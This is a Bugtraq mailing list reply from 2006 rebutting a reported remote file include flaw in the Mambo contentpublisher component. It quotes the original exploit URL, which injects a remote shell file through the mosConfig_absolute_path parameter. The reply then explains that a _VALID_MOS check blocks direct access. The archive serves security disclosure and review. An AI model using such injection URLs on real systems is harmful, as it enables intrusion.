Bugtraq mailing list archives
Re: contentpublisher Mambo Component Remote File Include Vulnerabilities
From: "Carsten Eilers" <ceilers-lists () gmx de>
Date: Thu, 24 Aug 2006 00:51:34 +0200
Hi, crackers_child () sibersavascilar com schrieb am Thu, 17 Aug 2006 20:38:57 +0000:
-------------------------------------------- Application : contentpublisher/ Component of Mambo ------------------------------------- ------------------------------------------- Bug İn contentpublisher.php ------------------------------------------- Exploit: http://[target]/[mambo_path]/components/contentpublisher/ contentpublisher.php?mosConfig_absolute_path=Shell.txt?
This script can not be called directly, look at the top of it: defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' ); So there is no vulnerability. Regards Carsten -- Dipl.-Inform. Carsten Eilers IT-Sicherheit und Datenschutz <http://www.ceilers-it.de>
Current thread:
- contentpublisher Mambo Component Remote File Include Vulnerabilities crackers_child (Aug 18)
- Re: contentpublisher Mambo Component Remote File Include Vulnerabilities Carsten Eilers (Aug 24)